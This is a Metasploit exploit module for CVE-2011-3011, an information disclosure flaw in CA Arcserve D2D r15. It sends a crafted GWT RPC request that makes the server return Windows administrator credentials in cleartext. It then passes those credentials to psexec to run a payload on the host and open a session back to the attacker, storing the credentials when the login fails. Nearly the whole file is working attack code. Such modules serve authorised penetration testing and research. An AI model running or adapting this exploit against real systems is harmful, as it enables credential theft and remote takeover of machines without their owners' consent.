1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Auxiliary::Report
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',
17
        'Description' => %q{
18
          This module exploits an information disclosure vulnerability in the CA Arcserve
19
          D2D r15 web server. The information disclosure can be triggered by sending a
20
          specially crafted RPC request to the homepage servlet. This causes CA Arcserve to
21
          disclosure the username and password in cleartext used for authentication. This
22
          username and password pair are Windows credentials with Administrator access.
23
        },
24
        'Author' => [
25
          'bannedit', # metasploit module
26
          'rgod', # original public exploit
27
        ],
28
        'License' => MSF_LICENSE,
29
        'References' => [
30
          [ 'CVE', '2011-3011' ],
31
          [ 'OSVDB', '74162' ],
32
          [ 'EDB', '17574' ]
33
        ],
34
        'DefaultOptions' => {
35
          'EXITFUNC' => 'process'
36
        },
37
        'Privileged' => true,
38
        'Payload' => {
39
          'Space' => 1000,
40
          'BadChars' => "\x00\x0d\x0a"
41
        },
42
        'Platform' => 'win',
43
        'Targets' => [
44
          [ 'Automatic', {} ],
45
        ],
46
        'DisclosureDate' => '2011-07-25',
47
        'DefaultTarget' => 0,
48
        'Notes' => {
49
          'Reliability' => UNKNOWN_RELIABILITY,
50
          'Stability' => UNKNOWN_STABILITY,
51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
        }
53
      )
54
    )
55

56
    register_options(
57
      [
58
        Opt::RPORT(8014),
59
      ]
60
    )
61
  end
62

63
  def service_details
64
    super.merge({
65
      port: 445,
66
      service_name: 'smb',
67
      post_reference_name: self.refname,
68
      last_attempted_at: DateTime.now
69
    })
70
  end
71

72
  def exploit
73
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
74

75
    data = "5|0|4|"
76
    data << "http://#{datastore['RHOST']}:#{datastore['RPORT']}"
77
    data << "/contents/"
78
    data << "|2C6B33BED38F825C48AE73C093241510|"
79
    data << "com.ca.arcflash.ui.client.homepage.HomepageService"
80
    data << "|getLocalHost|1|2|3|4|0|"
81

82
    cookie = "donotshowgettingstarted=%7B%22state%22%3Atrue%7D"
83

84
    res = send_request_raw({
85
      'uri' => '/contents/service/homepage',
86
      'version' => '1.1',
87
      'method' => 'POST',
88
      'cookie' => cookie,
89
      'data' => data,
90
      'headers' =>
91
      {
92
        'Content-Type' => "text/x-gwt-rpc; charset=utf-8",
93
        'Content-Length' => data.length
94
      }
95
    }, 5)
96

97
    if not res
98
      fail_with(Failure::NotFound, 'The server did not respond to our request')
99
    end
100

101
    resp = res.to_s.split(',')
102

103
    user_index = resp.index("\"user\"")
104
    pass_index = resp.index("\"password\"")
105

106
    if user_index.nil? and pass_index.nil?
107
      # Not a vulnerable server (blank user/pass doesn't help us)
108
      fail_with(Failure::NotFound, 'The server did not return credentials')
109
    end
110

111
    user = resp[user_index + 1].gsub(/\"/, "")
112
    pass = ""
113

114
    if pass_index
115
      pass = resp[pass_index + 1].gsub(/\"/, "")
116
    end
117

118
    srvc = {
119
      :host => datastore['RHOST'],
120
      :port => datastore['RPORT'],
121
      :proto => 'tcp',
122
      :name => 'http',
123
      :info => res.headers['Server'] || ""
124
    }
125
    report_service(srvc)
126
    if user.nil? or pass.nil?
127
      print_error("Failed to collect the username and password")
128
      return
129
    end
130

131
    print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
132

133
    # try psexec on the remote host
134
    psexec = framework.exploits.create("windows/smb/psexec")
135
    psexec.register_parent(self)
136

137
    psexec.datastore['PAYLOAD'] = self.datastore['PAYLOAD']
138

139
    if self.datastore['LHOST'] and self.datastore['LPORT']
140
      psexec.datastore['LHOST'] = self.datastore['LHOST']
141
      psexec.datastore['LPORT'] = self.datastore['LPORT']
142
    end
143

144
    psexec.datastore['RHOST'] = self.datastore['RHOST']
145

146
    psexec.datastore['DisablePayloadHandler'] = true
147
    psexec.datastore['SMBPass'] = pass
148
    psexec.datastore['SMBUser'] = user
149

150
    print_status("Attempting to login via windows/smb/psexec")
151

152
    # this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)
153
    begin
154
      psexec.exploit_simple(
155
        'LocalInput' => self.user_input,
156
        'LocalOutput' => self.user_output,
157
        'Payload' => psexec.datastore['PAYLOAD'],
158
        'RunAsJob' => true
159
      )
160
    rescue
161
      credential_data = {
162
        user: user,
163
        private_data: pass,
164
        status: Metasploit::Model::Login::Status::INCORRECT
165
      }.merge(service_details)
166
      create_credential_and_login(credential_data)
167

168
      print_error("Login attempt using windows/smb/psexec failed")
169
      print_status("Credentials have been stored and may be useful for authentication against other services.")
170
      # report the auth
171
      return
172
    end
173

174
    # report the auth
175
    credential_data = {
176
      user: user,
177
      private_data: pass,
178
      status: Metasploit::Model::Login::Status::SUCCESSFUL
179
    }.merge(service_details)
180
    create_credential_and_login(credential_data)
181

182
    handler
183
  end
184
end
185

186